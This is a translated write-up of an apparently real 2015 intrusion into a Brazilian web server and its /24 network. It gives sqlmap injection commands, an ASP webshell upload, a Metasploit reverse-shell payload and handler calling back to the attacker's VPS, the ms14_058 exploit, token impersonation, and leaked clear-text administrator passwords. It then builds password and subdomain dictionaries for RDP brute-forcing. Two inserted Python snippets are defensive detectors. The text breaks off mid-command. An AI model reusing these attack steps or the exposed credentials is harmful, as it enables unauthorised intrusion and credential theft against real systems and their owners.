
Title: See how I quickly get permissions to the entire C segment host


0x01 Introduction

Date/time: 2015. During this penetration test, I found that the administrator passwords of the several machines already compromised followed a clear pattern. By analysing the password rule and combining new passwords from it, I eventually obtained control of every machine in the target's C segment (/24). I personally feel this is a good practical case of universal/regular passwords on an intranet, so it seemed worth recording.

0x02 Getshell process

Website basic information detection:

Target site: http://www.that****elos.com.br

Server IP: 189.**.**.204 (Brazil)

Environmental Platform: ASP.NET

Server system: Windows. The site blocks access from domestic (mainland China) IP addresses, so I could only test from outside the firewall. Chrome plug-ins and a fingerprinting site did not reveal the exact server version, but from personal experience it should be Windows 2003.

Chrome browser plug-in: Server Details 1.0.12, Wappalyzer

Server system identification: http://fuwuqixitongshibie.51240.com/?q=

Website backend address: http://www.that****elos.com.br/admin/

Next, the Safe3WVS_v10.1 vulnerability scanner found several injection points. I verified one with sqlmap: the injection does exist, and the administrator table and column names were enumerated, but an error occurred when dumping the administrator's user name and password.


Enumerating table names:

sqlmap -u 'http://www.that****elos.com.br/detalhe_produto.asp?codProd=510' --tables

[7 tables]: categoryas, clients, destaques, itens, pedidos, produtos, usuarios

Enumerating column names:

sqlmap -u 'http://www.that****elos.com.br/detalhe_produto.asp?codProd=510' -T 'usuarios' --columns

[5 columns]: codusuario, email, login, nome, senha

Dumping data:

sqlmap -u 'http://www.that****elos.com.br/detalhe_produto.asp?codProd=510' --dbms access -T 'usuarios' -C 'email,login,senha' --dump --threads 10

Don't worry about the error sqlmap reports when dumping data. Since the administrator's table and columns are already known, you can use other injection tools to dump the administrator user name and password, for example A D (阿D) or Ming Xiaozi (明小子); use whatever works.


Through this injection point I obtained the website administrator account and password, logged into the website backend, and found an upload function with no filtering at all. I uploaded an ASP webshell disguised as an image and obtained webshell access on this site.


0x03 Privilege escalation process

Server basic information detection:

Ports open: 21, 80, 135, 443, 445, 873, 65432

Patch status: 750+ system patches were applied (Windows 2003 x86)

Script detection: only supports ASP script files, not PHP or ASPX

Disk permissions: Some folders on the C: drive are readable/writable. After so much time spent on cross-site work, this is the first time I have encountered a 2003 machine with 750+ patches. Although I knew the chance of a local EXP working was low, it still had to be tried; maybe it would "succeed". After trying the following EXPs, the result was as expected: all failed.

pr.exe, Churrasco.exe, 2003.exe, NDProxy.exe, iis6.exe, MS11-046.exe, MS10-048.exe, MS11-080.exe, MS13-051.exe, debug.exe

Next, let's try the ms14_058_track_popup_menu privilege-escalation module. Since the target blocks domestic IP addresses, the session cannot be received after running the payload locally, so the author tests from a foreign VPS.

root@c2unix:~# msfpayload windows/meterpreter/reverse_tcp LHOST=37.*.**.52 LPORT=443 X > /media/sf_Temp/test.exe

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 37.*.**.52

msf exploit(handler) > set lport 443

msf exploit(handler) > exploit

[*] Started reverse handler on 37.*.**.52:443

[*] Starting the payload handler.

[*] Sending stage (770048 bytes) to 189.**.**.204

[*] Meterpreter session 1 opened (37.*.**.52:443 - 189.**.**.204:1150) at 2015-01-01 13:48:01 +0000

Check the current session's privileges and system information. getsystem failed, so background the session and load the ms14_058_track_popup_menu privilege-escalation module for testing.

meterpreter > getuid

Server username: $U$AUTORIDADE NT\SERVIO LOCAL-0x4155544f524944414445204e545c5345525649c74f204c4f43414c

meterpreter > getsystem

[-] priv_elevate_getsystem: Operation failed: Access is denied.

meterpreter > sysinfo

Computer : WEB200

OS : Windows .NET Server (Build 3790, Service Pack 2).

Architecture : x86

System Language : pt_BR

Meterpreter : x86/win32

meterpreter > background

[*] Backgrounding session 1.

msf exploit(handler) > use exploit/windows/local/ms14_058_track_popup_menu

msf exploit(ms14_058_track_popup_menu) > set payload windows/meterpreter/reverse_tcp

msf exploit(ms14_058_track_popup_menu) > set lhost 37.*.**.52

msf exploit(ms14_058_track_popup_menu) > set lport 443

msf exploit(ms14_058_track_popup_menu) > set session 1

msf exploit(ms14_058_track_popup_menu) > exploit

[*] Started reverse handler on 37.*.**.52:443

[*] Launching notepad to host the exploit.

[+] Process 11464 launched.

[*] Reflectively injecting the exploit DLL into 11464.

[*] Injecting exploit into 11464.

[*] Exploit injected. Injecting payload into 11464.

[*] Payload injected. Executing exploit.

[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.

[*] Sending stage (770048 bytes) to 189.**.**.204

[*] Meterpreter session 2 opened (37.*.**.52:443 - 189.**.**.204:1788) at 2015-01-01 14:03:44 +0000

Here you can see that the ms14_058_track_popup_menu module returns a new meterpreter session, but it still has only ordinary privileges. I have run into this situation many times in previous engagements; the exact cause is unknown and I have not investigated it in depth.

meterpreter > getuid

Server username: $U$AUTORIDADE NT\SERVIO LOCAL-0x4155544f524944414445204e545c5345525649c74f204c4f43414c

meterpreter > getsystem

[-] priv_elevate_getsystem: Operation failed: Access is denied.

meterpreter > hashdump

[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

The ms14_058_track_popup_menu privilege-escalation module failed. The author fell into deep thought, then suddenly remembered the incognito extension for meterpreter, which can steal tokens from the target host or impersonate users.

Let's first look at the administrator users on this server, which makes it easier to find an administrator token later. Besides the default Administrator, there is also cronjob.


list_tokens -u lists the available user tokens. Too many tokens are listed here, so the author used .Snip. to omit part of the output. You can see that the cronjob administrator token is among the available user tokens.

List available user tokens:

meterpreter > use incognito

Loading extension incognito...success.

meterpreter > list_tokens -u

[-] Warning: Not currently running as SYSTEM, not all tokens will be available

Call rev2self if primary process token is SYSTEM

Delegation Tokens Available

=====================================================

AUTORIDADE NT\SERVI?O LOCAL

WEB200\aewcorp

WEB200\attcorreia

WEB200\cronjob

WEB200\sueddesigner

.Snip.

Impersonation Tokens Available

=====================================================

WEB200\aluggo

WEB200\ciacompropaganda

WEB200\datahome

WEB200\ipirangacontabil

WEB200\web200

.Snip.

Impersonate the cronjob user's token:

meterpreter > impersonate_token WEB200\\cronjob

[-] Warning: Not currently running as SYSTEM, not all tokens will be available

Call rev2self if primary process token is SYSTEM

[+] Delegation token available

[+] Successfully impersonated user WEB200\cronjob

meterpreter > getuid

Server username: WEB200\estoquedomarmorista

meterpreter > hashdump

.Snip.

The current machine: IP address 189.**.**.204, remote (RDP) port 65432, computer name WEB200. The target's clear-text passwords captured with the mimikatz tool under meterpreter are listed below; the administrator's hash could not be cracked (the password is 16 characters long).

0;980627246 NTLM WEB200 Administrador w3b200r0x0271114

0;3450401626 NTLM WEB200 cronjob 016b2023ee9b897ca643

0;1214252650 NTLM WEB200 web200 p1cadasgalaxi4s

0;1236893630 NTLM WEB200 thatycabelos vbs147369

0;74485534 NTLM WEB200 iis_user 123abc!#

Using some common vulnerabilities, I also obtained webshell access on the 189.**.**.9 and 189.**.**.55 servers in the same C segment. When escalating privileges I noticed many similarities with the 204 server described above.

For example: the same folder permissions, uploading cmd.exe to execute commands, the server host-name scheme, insufficient permissions for some commands, the same remote port number, and so on.

The only difference is that the EXP we uploaded ourselves could not be executed and a 0x2331 error was shown, as in the figure below. However, it seems that once the server restarts the EXP runs normally; alternatively you can try changing the uploaded EXP's suffix to TXT.


0x04 Password/domain name rules

From the information gathered on several machines and personal experience, it is fairly safe to conclude that all machines in this C segment are managed by the same administrator, so the administrator's passwords should follow a rule that can be discovered. Next, let's analyse the password rule together.

(1) Password rule analysis

The administrator accounts commonly used on several machines are Administrador and cronjob. The Administrador password of the 189.**.**.204 server is w3b200r0x0271114. The password rule depends mainly on the 3-digit number in the host name and has nothing to do with the IP address.

w3b = fixed value, 200 = computer name (3 digits), r0x0271114 = fixed value. Using WPS spreadsheet functions, extract the 3 digits of the host name with =RIGHT(H2,3), then combine a new password with =B2&C2&D2. In this way the administrator passwords of the two other C-segment machines, 189.**.**.9 and 189.**.**.55, were combined through the password rule, as shown in the figure below.
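From the defender's side, the pattern above is exactly what a credential audit should catch before an attacker does. The following Python is an added example, not part of the original post: it takes a constructed inventory of host-name/password pairs (hypothetical values, not the page's data), replaces each host's numeric suffix in its password with a marker, and reports any template shared by two or more hosts.

```python
import re
from collections import defaultdict

# Constructed sample inventory (hostname -> local admin password); hypothetical values.
INVENTORY = {
    "app101": "fr0nt101k9z2",
    "app102": "fr0nt102k9z2",
    "app117": "fr0nt117k9z2",
    "app300": "fr0nt300k9z2x",      # same idea but a different suffix: its own template
    "db250":  "S3cure!Random#Pw",   # unrelated to the host name: not flagged
}

def host_digits(hostname):
    """Trailing digit run of a host name (e.g. 'web200' -> '200'), or None."""
    m = re.search(r"(\d+)$", hostname)
    return m.group(1) if m else None

def template_of(hostname, password):
    """Password with the host's numeric suffix replaced by <HOST#>, or None if the
    password does not embed it. Single digits are ignored: they match too often by chance."""
    digits = host_digits(hostname)
    if not digits or len(digits) < 2 or digits not in password:
        return None
    return password.replace(digits, "<HOST#>", 1)

def find_shared_templates(inventory, min_hosts=2):
    """Group hosts by password template; return templates used on >= min_hosts hosts.
    One leaked password from any host in a group reveals the password of all the others."""
    groups = defaultdict(list)
    for host, password in inventory.items():
        tmpl = template_of(host, password)
        if tmpl:
            groups[tmpl].append(host)
    return {t: sorted(h) for t, h in groups.items() if len(h) >= min_hosts}

if __name__ == "__main__":
    for tmpl, hosts in find_shared_templates(INVENTORY).items():
        print(f"shared template {tmpl!r} on {len(hosts)} hosts: {', '.join(hosts)}")
```

Run against a real vault export, any group it prints is a set of machines whose local admin passwords should be rotated to unrelated random values.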


So far the host name is only known through machines already under control. How can we learn the host name when we do not have webshell access to the other machines in the C segment? Or is there a way to get directly into the other servers in the C segment? Of course there is; only one idea is given here.

Blasting ideas:

The default RDP port is 3389, but the RDP port on the several machines obtained is 65432. Based on the password found, we can generate an efficient dictionary and brute-force RDP on every IP in the segment 189.**.**.X, limiting the 3-digit host-name number to 300 at first and increasing it if that does not work.

w3b200r0x0271114

w3b201r0x0271114

w3b202r0x0271114

w3b203r0x0271114

w3b204r0x0271114

w3b205r0x0271114

w3b206r0x0271114

w3b207r0x0271114

w3b208r0x0271114

w3b209r0x0271114

w3b210r0x0271114

.Snip.
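A detection for the spray described above, written as an added example from the defender's side (not part of the original post). It parses constructed Windows logon events (hypothetical hosts and IPs) and flags a source that fails RemoteInteractive logons (logon type 10, i.e. RDP on whatever port it listens on) against several hosts within a short window, noting whether that source later succeeded anywhere.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (hypothetical hosts/IPs), one flattened Security event per line:
# time, host, event ID (4625 = failed logon, 4624 = successful logon), logon type, user, source.
SAMPLE_LOG = """\
2015-01-01T13:48:01Z WEB200 4625 LogonType=10 TargetUser=Administrador SourceIP=203.0.113.7
2015-01-01T13:48:03Z WEB201 4625 LogonType=10 TargetUser=Administrador SourceIP=203.0.113.7
2015-01-01T13:48:04Z WEB202 4625 LogonType=10 TargetUser=Administrador SourceIP=203.0.113.7
2015-01-01T13:48:06Z WEB203 4625 LogonType=10 TargetUser=Administrador SourceIP=203.0.113.7
2015-01-01T13:49:10Z WEB203 4624 LogonType=10 TargetUser=Administrador SourceIP=203.0.113.7
2015-01-01T13:50:00Z WEB210 4625 LogonType=10 TargetUser=jsmith SourceIP=198.51.100.9
2015-01-01T14:30:00Z WEB211 4625 LogonType=10 TargetUser=jsmith SourceIP=198.51.100.9
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\d{4}) LogonType=(\d+) TargetUser=(\S+) SourceIP=(\S+)$")

def parse_events(text):
    """Parse the flattened lines into dicts; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, host, eid, ltype, user, src = m.groups()
            events.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "host": host,
                           "id": int(eid), "ltype": int(ltype), "user": user, "src": src})
    return events

def detect_lateral_spray(events, window=timedelta(minutes=10), min_hosts=3):
    """Flag each source IP with failed type-10 logons on >= min_hosts distinct hosts inside
    any `window`; keying on logon type rather than port 3389 catches RDP on a moved port."""
    fails, successes = defaultdict(list), defaultdict(set)
    for e in events:
        if e["ltype"] != 10:
            continue
        if e["id"] == 4625:
            fails[e["src"]].append((e["ts"], e["host"]))
        elif e["id"] == 4624:
            successes[e["src"]].add(e["host"])
    alerts = {}
    for src, entries in fails.items():
        entries.sort()
        for i, (start, _) in enumerate(entries):
            hosts = {h for t, h in entries[i:] if t - start <= window}
            if len(hosts) >= min_hosts:
                alerts[src] = {"hosts": sorted(hosts), "later_success_on": sorted(successes[src])}
                break
    return alerts
```

A success from a source that was just flagged (here WEB203) is the one to treat as a probable compromise rather than a user typo.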

(2) Domain name rule analysis

During the test I saw subdomains of the form "hostname.test.net" many times. After visiting several of them I confirmed my idea: the administrator had set up such a subdomain resolving to each server, with the naming rule hostname.test.net.

Once the domain-name rule is known, the webshell step can be skipped and the host name obtained directly; the password is then combined to enter the other machines in the C segment. This was tested on more than 10 machines and works.


Image metaphor:

All machines in the C segment fall = password rule + host name + domain-name rule. The password rule is the father, the host name the son and the domain-name rule the mother; both parents need the son, and only when all three live together is the family complete, with none missing.

Ideas expansion:

Generate an efficient "hostname.test.net" subdomain dictionary according to the domain-name rule, limiting the host-name number to 300. Then batch-ping these subdomains with a script to obtain the IP address and corresponding host name of each live machine in the C segment, and combine the new password according to the password rule.

web200.test.net

web201.test.net

web202.test.net

web203.test.net

web204.test.net

web205.test.net

web206.test.net

web207.test.net

web208.test.net

web209.test.net

web210.test.net

.Snip.

We can then use the WPS spreadsheet functions directly to combine a new password, =B2&RIGHT(LEFT(E2,6),3)&D2, and so obtain the administrator passwords of all live machines in the C segment through the password rule, as shown in the figure below.


0x05 Summary

In intranet/domain environments we often encounter universal/regular passwords. Typically the rules are built from the host name, IP address, year and common strings such as 123/qwe/!@#. We can also analyse the common points and rules across the various passwords of the website backend, middleware, database, third-party software, etc., and then combine them into efficient dictionaries for brute-forcing. To borrow a sentence from @江天: the essence of penetration testing is information gathering.

1. Gather information on the target system. Here the system was identified as Windows 2003 with IIS 6.0 through an online CMS fingerprint; the website administrator backend directory admin2 was found with the Yujian directory scanning tool, and the user name and password were found with a scanning tool. Several injection points were found with the Safe3WVS_v10.1 vulnerability scanner; sqlmap verified that the injection point does exist and enumerated the administrator table and columns, but could not dump the user name and password: sqlmap -u
